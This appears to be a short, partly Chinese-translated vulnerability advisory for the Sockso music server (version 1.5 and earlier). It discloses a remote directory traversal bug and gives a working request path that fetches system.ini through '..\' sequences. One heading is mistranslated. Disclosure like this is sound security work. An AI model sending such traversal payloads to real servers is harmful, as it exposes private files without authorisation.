####################################################################### Luigi Auriemma 程序: Sockso
影响版本 <= 1.5 平台: , Mac, Linux 缺陷: directory traversal 执行: remote 作者: Luigi Auriemma ####################################################################### 1) 概括 2) Bug 3) The Code 4)修复 ####################################################################### =============== 1)接受啊 =============== 摘自作者主页: "Sockso是免费开源的个人音乐服务程序! It's designed to be as simple as possible so that anyone with a mouse and some mp3's can get their friends listening to their music across the internet in seconds!" ####################################################################### ====== 2) Bug ====== The server is affected by a directory traversal vulnerability that allows downloading arbitrary files from the disk where the software is installed. ####################################################################### =========== 3) The Code =========== /system.ini /file/..\..\..\..\..\\system.ini ####################################################################### ====== 4)修复 ====== 升级到 1.5.1版 #######################################################################
